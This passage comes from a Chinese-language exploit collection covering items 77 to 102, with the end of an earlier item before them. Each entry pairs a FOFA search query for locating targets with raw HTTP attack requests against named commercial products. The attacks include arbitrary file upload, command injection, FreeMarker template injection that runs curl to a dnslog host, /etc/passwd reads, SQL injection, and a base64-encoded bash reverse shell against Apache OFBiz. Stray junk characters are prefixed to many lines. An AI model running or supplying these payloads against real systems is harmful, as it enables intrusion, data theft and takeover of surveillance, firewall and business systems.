7 D3 w7 h! d' ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ X( K. G" Z: i3 x9 Z0 Q! j& Z, f. f) l0 ZAccept-Encoding: gzip, deflate
- B% v' ?* M4 p3 \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
- z7 d" E3 |& ^8 j; A: h& @1 FUpgrade-Insecure-Requests: 1

' I; k6 e7 G9 f  J) |0 n9 q{
"command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}
& u% q. u. O$ t& R  Y" R3 ^

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

0 e7 ~6 G! O0 W# u9 E
' V& @" R8 x: r
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
FOFA：body="F22WEB登陆"
6 E' \# `5 [, j0 i! RPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
% v8 S6 ]0 L  m& `1 ]. F8 C6 YHost: x.x.x.x
* K3 c& H6 l, E$ B( ^1 K) s. l/ s: sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
0 M0 c2 @4 d+ K* HContent-Length: 433
Accept: */*
7 f: U- o4 `. o  a8 ?9 ?Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
5 k4 \6 x, a9 K) N# V( A! LContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"
9 J, l7 r) P( C
' r  Q* [# {5 O7 X( F5 y8 t7 j5 O! J/upload/udplog
3 u4 \' G+ y8 V$ T& \2 e------------398jnjVTTlDVXHlE7yYnfwBoix
# g# h. c9 x" m5 Q- OContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
$ P7 J5 l, I* v- @5 @Content-Type: application/octet-stream

" `7 @* B7 Z2 j: @' g0 I  y7 W# nhello1234567
  C( k8 d- W8 M0 F" K2 O2 p' y- \------------398jnjVTTlDVXHlE7yYnfwBoix
/ ]  L* F* Y  \6 ZContent-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

9 d; |" X" }1 T
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
6 u3 d6 z# l: z& wFOFA：icon_hash="2001627082"
4 B8 O/ X; h0 v$ r2 a) z2 kPOST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
, l6 q& v  ]7 y" o; x/ EContent-Length: 336
0 ^! I$ _" w1 T: ~3 \8 q# ~Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

3 }/ |" S$ `7 K9 L* {2 O% n( f" c------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

  V/ }6 g% G) J4 t8 D) _YsOxWxSvj1KyZow1PTsh98fdu6l
  a9 c5 p& F* z9 o4 e& m------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"
7 a1 l  Z- p6 r. Z: @) x* Q
: P* T! w) R, E; u3 b& T/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--
5 [0 o! U2 t7 g$ s) O

0 D: K( X" D* IGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
+ b* r1 T7 s0 d, i5 _' ZHost: x.x.x.x


9 A& p) t; Y( O! P0 a9 Q% u79. BYTEVALUE 百为流控路由器远程命令执行
FOFA：BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
# `8 a- D3 ~& J2 c. [2 DHost:IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
8 [3 o. r6 S; P1 G6 c7 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 V  _) |1 ?  v% I/ XAccept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
. V+ b6 I7 ?6 U! A( r
! R' {4 N+ w/ b  U6 d& C1 D; Q1 S+ L
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
FOFA：app="速达软件-公司产品"
! ~3 K9 |/ P# q9 A! zPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! y( v' E! ]/ X5 fContent-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 H9 J3 A" B' x( J) B  ZConnection: close
! M9 d8 M: {7 q6 _8 R: k( R2 zContent-Type: application/octet-stream
Upgrade-Insecure-Requests: 1
8 Z* l' H) j1 ^/ x- [7 V& r0 w- b
<% out.print("oessqeonylzaf");%>

2 C7 H) Q) U! d5 }
' A) U' y$ R2 sGET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
4 z- z9 ]9 U, \4 _- r& bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
' M2 l9 q$ L2 L, fAccept-Encoding: gzip


* r" `1 @( H& B: B* p1 O; [& h81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
FOFA：app="uniview-视频监控"
* ~/ J$ C- W4 ZGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
0 a! U. H& e. h- iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, }5 c  [! y& h% d* h1 ]0 S! ~Connection: close
Accept-Encoding: gzip
7 d& \7 ~. r/ K$ p: y8 H. s

, i+ G1 `2 _8 u6 O4 K) q82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
FOFA：app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
: p, Y; m! ]# BUser-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
6 x$ r; Y2 w2 U. G" a$ rConnection: close
) ~7 R0 ]' G% v' aContent-Type: application/x-www-form-urlencoded
Referer: BaseURL
8 Y# Y+ t! `) _2 Y# Y5 {
6 |# |8 ]. ^( oz1=1&z2="|id;"&z3=bhost
; s- C* Y# B! ]( R
. `; {8 p  _, N
83. JeecgBoot testConnection 远程命令执行
& o6 \! n3 i( L5 g! T" D  nFOFA：title=="JeecgBoot 企业级低代码平台"
/ ]* C; D! q/ ~. Z
* G9 f0 X: |; @# ?. [$ H, g
POST /jmreport/testConnection HTTP/1.1
6 `4 m3 G( Q9 ?. E9 c$ f$ eHost: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
% I& X1 K% O2 u1 e1 q: {Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
' t5 c& ^" |" D' V' rContent-Type: application/json
" O# A+ W/ M$ D1 W6 j1 {' w
PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
( {& _8 A  o  S7 Y& b# JFOFA：title=="JeecgBoot 企业级低代码平台"


( Y4 M4 y4 u5 g3 \: x
4 P3 P' {- [, L, A! I0 @% R, [; PPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
* B6 p7 F, V# Q( eConnection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
) ~" W; ]$ ^: p/ C( S& N8 b}

. h! q% [6 v3 G4 N) e
85. SysAid On-premise< 23.3.36远程代码执行
+ Q0 q7 A1 O8 m) q$ u4 l6 _  hCVE-2023-47246
$ Q  O! m% J: j2 {FOFA：body="sysaid-logo-dark-green.png"
EXP数据包如下，注入哥斯拉马
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
7 c1 y( Z4 ^6 d, y: _% |9 D' L$ mHost: x.x.x.x
1 `( X# t9 u) y8 _1 v4 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 z4 z+ S! I# v3 x/ JContent-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD
' A3 `3 |; T3 X+ Z
! N& E3 @3 k% w回显URL：http://x.x.x.x/userfiles/index.jsp
& n  h  M0 k' h& ]+ g/ J( _
4 N9 p$ }+ A' b  Y& U0 {) h; N86. 日本tosei自助洗衣机RCE
' |0 G$ [2 ]9 e# V. BFOFA：body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
& R- v' A6 G/ _. v+ g7 K! f# iContent-Length: 44
Accept: */*
  @' v$ z. S/ B( F  W$ ZAccept-Encoding: gzip
, K1 s' }. T8 @Accept-Language: en
$ U6 J9 ~. E  q, oContent-Type: application/x-www-form-urlencoded
* I1 q% q/ b) o/ S* j) k! y
host=%0acat${IFS}/etc/passwd%0a&command=ping


* a5 l' K  n# z3 P87. 安恒明御安全网关aaa_local_web_preview文件上传
" V" W- F7 a- t* H3 XFOFA：title="明御安全网关"
( }. @7 E! W# B% L7 `5 sPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
2 i' U9 K9 U% Q& ?6 y! tHost: X.X.X.X
, Z! K) p' @, @, K- F; ^2 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( _: Z/ e2 t, i- V  i! vConnection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
: t- w: c2 \8 d- s
3 n0 f% a. n2 V) r9 G; I--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
5 S; j  j) L- Z7 ~( a: n( e8 K5 wContent-Type: text/plain
6 |: x& w; ?& f" O
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
8 P  P* y" D& }' V# r7 V--qqobiandqgawlxodfiisporjwravxtvd--
" p; i  r7 J" M) [) V) K0 W
1 ~3 f/ n0 f$ W! ~/ A9 a" D& \
/jfhatuwe.php

7 k# o. k* K# S$ m: U88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
0 M( ~! t+ a' m; l% t$ X/ qFOFA：title="明御安全网关"
, j9 B  G$ X- D4 O. QGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
; e2 Y* ~; q& p- a1 }! jHost: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( P( M# n+ g' YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 Y1 S. G% F3 _: A( B! FConnection: close


5 b0 m& T: ]1 B2 ?/astdfkhl.php

89. 致远互联FE协作办公平台editflow_manager存在sql注入
FOFA：title="FE协作办公平台" || body="li_plugins_download"
3 Q4 a9 ~1 r4 {* cPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
0 i& {' a) n7 p% yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  x6 |5 S4 s, z- `8 @/ RConnection: close
$ d% L! H, X7 W$ ?% q5 UContent-Length: 41
' D8 g, R/ V  k8 NContent-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
( k! v  `( Y* y5 I6 `. N' N% P
option=2&GUID=-1'+union+select+111*222--+


1 b2 X& F! C0 N+ L: k" N0 Q90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
% H. a7 N1 l# k' a( xFOFA：icon_hash="-1830859634"
/ v% p3 W! S( i$ xPOST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
4 l9 j( d" |3 \0 OContent-Length: 51
- t# Z% g& R1 O3 T5 g  _; mAccept: application/json, text/javascript, */*; q=0.01
( `8 s2 P% e) Y! E- u; `# zAccept-Encoding: gzip, deflate
  o( a& \' G% D( t$ ~7 F4 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
8 e: K4 n6 M* J7 F! O1 N( K
7 n# r- q; y' v! \& \& ~
, W! P$ m* z3 ^+ V8 b91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
FOFA：title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
! l# t4 g2 i9 J! y4 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
# l: X( q0 i% A9 h: v4 ~Accept: */*
0 r: @  r) r! r% d3 t! nConnection: keep-alive
( Q) ^$ n$ A' D( s
1 h, |+ c" }3 k% P0 f! n
2 z3 w8 {9 s( a$ N
92. 海康威视运行管理中心session命令执行
/ K5 {& U# s3 `; e! f% i, @! HFastjson命令执行
7 W* g( x: S- ?' G( @hunter：web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
/ Z9 Y; A2 J2 I8 V4 U7 V7 cHost:
$ V2 P& V; ?6 B6 k3 I7 u2 l; ~# a, X/ XAccept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
, }' d* _0 t8 P$ F% j! kX-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
2 T% R$ q' }( q. q. VX-Language-Type: zh_CN
5 [% Z9 x+ h1 z- X6 M; W" p) T& K9 CTestcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
! V& I7 Y: R2 l4 a" |+ h' J# vContent-Length: 5778
* l# |3 F0 ~1 q, Q
; b+ H* d; R, X( q. lPAYLOAD

6 r* C) R$ V! V
9 z: C) p- G# ]7 R$ K93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
FOFA：fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
( R6 ~, [9 y& T4 Z$ ~Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"
8 F5 t5 h: n1 D( [
5 M% x9 z& `, ~6 i: q' u) \10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
# F- t/ G4 o9 W1 iContent-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
1 n, J. ]' w, d* wContent-Disposition: form-data; name="submit_post"

obj_app_upfile
' n9 H, T+ t$ s" j3 a  V------WebKitFormBoundarykcbkgdfx
2 t4 Y* Y$ f7 c; ^Content-Disposition: form-data; name="__hash__"
# I6 b) ]+ o  N7 {  u. S5 n
0b9d6b1ab7479ab69d9f71b05e0e9445
+ _$ q( |) P6 G------WebKitFormBoundarykcbkgdfx--

* ^1 n" l% o2 d5 k+ F% o1 |, P; i
/ U* c) V/ L1 p9 V5 v) V- eGET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
. H, F7 k# G0 j9 f- j  C# E7 {
) P6 j7 V# [9 V! m3 i1 Y) b, p- I
0 L. \; {+ q% H/ Q: P94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
FOFA：fid="1Lh1LHi6yfkhiO83I59AYg=="
8 q5 m2 P7 k6 ]* U, r% y% \( NPOST /?g=obj_area_import_save HTTP/1.1
  v: Q4 C. K2 x: @2 l: M. N2 _Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
% M( E5 J2 ^% R2 pContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain
4 e9 A( K+ D+ q. I. H  E
pxplitttsrjnyoafavcajwkvhxindhmu
' {- d8 t# M+ N4 \& v* I------WebKitFormBoundarybqvzqvmt
6 n% n  W6 v; e( ~! JContent-Disposition: form-data; name="submit_post"
; `6 o+ Q$ O6 o
obj_app_upfile
( T: ^: R; Y3 I8 [/ e! P------WebKitFormBoundarybqvzqvmt
% B- M! K0 I7 S% B, W) w7 B! BContent-Disposition: form-data; name="__hash__"
3 d' z3 o8 _4 V" s% E! h0 U/ Z# _
5 |8 v& ^! Y, s4 v  m( z/ p" ~% S0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

4 I  ?$ P" w  W( m8 T+ E4 L: a

, v, g. }1 M0 q4 H2 W. LGET /attachements/xlskxknxa.txt HTTP/1.1
% E! @( `7 n) _4 l9 PHost: xx.xx.xx.xx
9 {" N" ^# }5 f! e, V. D8 LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

1 W5 E, v: i$ x  `8 t4 v. E, d

' R+ B0 R* w  k1 F* T95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
CVE-2023-49070
: ?' k5 b+ Y( J0 ~) MFOFA：app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 f0 x* L) V' \) \( x. X7 A) \Host: x.x.x.x
; ?8 T$ @+ P. j# k6 Y8 |User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
4 N# H/ s% O; E) \1 a1 M- lContent-Length: 889
! `6 G, Y& }0 aContent-Type: application/xml
Accept-Encoding: gzip

/ g. G7 H7 E7 y* h/ T1 n  a- T<?xml version="1.0"?>
<methodCall>
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
, }1 W+ v2 w* K& z    <params>
. C4 ]0 \/ v* ]7 t: w! `4 h  {! Y8 b      <param>
      <value>
        <struct>
       <member>
          <name>test</name>
+ k" e) C/ K8 ^          <value>
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
0 S" R% E# p. Q! D4 Z" Q( i          </value>
! Q2 V/ d: Y/ g* r. T5 S        </member>
7 x+ Y5 g$ |$ X8 e/ d      </struct>
      </value>
    </param>
    </params>
- \3 R4 X1 V) S0 @, K& I</methodCall>

2 k5 N1 E4 ]; h8 `$ ^
, a8 b/ r% u4 q$ i# i$ p用ysoserial生成payload
" M2 I7 z' T% x* [% Vjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
7 {3 C) d& Q3 [4 i3 r/ Z

将生成的payload替换到上面的POC
. |0 T' h' a: sPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
. y8 v$ f3 l) p. ^2 |) W* m" b% @Host: 192.168.40.130:8443
5 X7 Q( V' T: i- s! ~& u1 u" KUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
# L3 F. {, y% j& c& u) zContent-Length: 889
( e4 Z% r$ P0 {$ L& D8 }Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz  18.12.11 groovy 远程代码执行
) M- O1 i8 ^+ m! ^0 rFOFA：app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
2 N7 H1 G; H5 M" f# |3 `3 |Host: localhost:8443
( R3 X# V8 l7 }0 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
5 ^9 e* d; _1 F) n+ d, k) U* `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

9 V, ]# z; x: k1 z6 A6 E0 d3 s
9 G* T1 I4 u9 [. d7 ~/ T反弹shell
- _6 e" n$ @& T& ]  J在kali上启动一个监听
- ]: u) I+ Q9 K& e4 w8 Wnc -lvp 7777
* Q$ ?- p- d2 n% s# j7 F. G
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
0 Q9 t9 V0 n4 E* RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
. G! u" s- h* n$ zAccept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
- Y5 w* S. Z6 C* ]1 p0 pContent-Length: 71
! a6 |, b% Y! D: n% C' g
2 \. Z5 p& o; N9 x& H$ D- P5 }groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
0 R5 Q8 N! Y1 i; y/ b  ?9 u  i
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
+ @' X& f% _8 D; l) gFOFA：body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
5 c: n0 ?& E1 j& ?6 |3 E/ OGET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
7 E3 c5 x& C8 D3 CCookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
/ R" }$ {% O: _
. W" F5 p- d1 x# c" w+ I- H
9 E/ H( Z* A  d# M98. SpiderFlow爬虫平台远程命令执行
CVE-2024-0195
7 s+ u1 @3 X6 @% e" SFOFA：app="SpiderFlow"
POST /function/save HTTP/1.1
3 M$ r  a3 u# j( h0 `3 V" eHost: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 V0 D$ a4 k: AConnection: close
% M2 p! K2 ]9 a$ u, YContent-Length: 121
- e; `6 R) Z2 \Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
5 w: N/ s7 Z; ^# t- U! y, wX-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
2 T0 H! x) l$ F6 S2 a' z
- H5 F# O+ m6 ^1 e- e: p3 f* F
7 z, \; q- Q  B% O$ @9 j5 c99. Ncast盈可视高清智能录播系统busiFacade RCE
CVE-2024-0305
FOFA：app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
1 ]& r$ b& L; u5 `' zHost: 192.168.40.130:8080
* O  X- a: Y3 T& ~. J  `/ QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
; O' e8 e: c- P4 |: X4 C. G; DAccept-Encoding: gzip, deflate
- x; {3 f& p- KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" c3 B$ Z8 {0 K/ _9 JContent-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
/ O/ X1 V' Q* C1 z0 V
" c7 u  ~& w2 B9 p* {4 b8 h%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


" c) ]$ ~& [4 e100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
2 D2 w0 C# n. J0 y0 X1 `* N) b! zCVE-2024-0352
! ^4 _& K. V: n/ n& g( R' {+ p2 zFOFA：icon_hash="874152924"
$ x' V0 T; \( O- l+ N) l1 EPOST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
( K6 s' N* u4 e9 T0 XContent-Length: 201
9 ~+ m1 E. o' Z6 C  M0 C  tContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
1 m, F" \& {& u4 `( p) T  aAccept-Encoding: gzip
3 Q) `* }' A$ B6 N) s
" a9 v2 T" K& t+ B9 B------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
: n, V& V. |1 L* w# j2 VContent-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
- O6 n/ f0 V2 N; \. p------WebKitFormBoundarygcflwtei--


! Q9 W9 }! l/ k6 \! L/ Y101. ivanti policy secure-22.6命令注入
CVE-2024-21887
FOFA：body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
5 m- r+ I1 x6 B/ V/ k* }Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: d& R. ~  Z  R5 dConnection: close
Accept-Encoding: gzip

  {; B: F" i% h: u$ w
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
CVE-2024-21893
9 ?7 i% W4 S: ]3 s7 c# x8 H5 L( sFOFA：body="welcome.cgi?p=logo"
